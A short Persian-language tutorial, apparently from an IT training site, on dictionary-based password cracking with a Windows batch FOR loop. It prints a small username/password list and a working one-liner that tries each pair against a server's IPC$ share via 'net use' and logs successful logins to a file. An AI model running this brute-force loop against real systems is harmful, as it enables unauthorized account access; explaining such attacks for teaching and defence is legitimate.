یکی از ساده ترین روش های Password Cracking بدون نیاز به هرگونه برنامه و نرم افزار خاص استفاده از حلقه FOR ساده در Batch Scripting ویندوز یا حتی لینوکس می باشد. شما در مثال زیر می توانید مشاهده کنید که هکر براحتی با استفاده از یک فایل متنی بسیار ساده username ها و password های کاربران را جستجو و کرک می کند. این فایل متنی مثل همان فایل متنی است که در نرم افزارهای کرک برای Dictionary Attack مورد استفاده قرار می گیرد. در برنامه پایین حلقه FOR ما براحتی خط به خط فایل مورد نظر را خوانده و تست می کند که آیا پسورد ورود به سرور در آن وجود دارد یا خیر ، در ابتدای خطوط سطح دسترسی های مورد نیاز برای دسترسی به فایل درون سیستم داده شده است و از طرفی در ادامه برای اجرا شدن اسکریپت مورد نیاز حتما باید به دایرکتوری که در آن ساخته شده است با استفاده از CMD مراجعه شود :
[file: credentials.txt] administrator "" administrator password administrator administrator -------------------------------------------------------------------- c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^ More? do net use \\tosinso.com\IPC$ %j /u:tosinso.com\%i^ More? 2 >> nul^ More? && echo %time% %date% >> outfile.txt^ More? && echo \\tosinso.com acct: %i pass: %j >> outfile.txt c:\>type outfile.txt
اگر در مثال بالا حلقه بتواند username و password معتبری از سرور هدف که tosinso.com است پیدا کند آن را در قالب فایلی به نام output.txt برای شما خارج می کند. در مثال بالا در اصطلاح برای ارتباط با سرور از یک Null Session استفاده شده است که قبلا در ITPRO بصورت کامل آن را معرفی کرده ایم. ITPRO باشید
نویسنده : محمد نصیری
منبع : ITPRO
هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد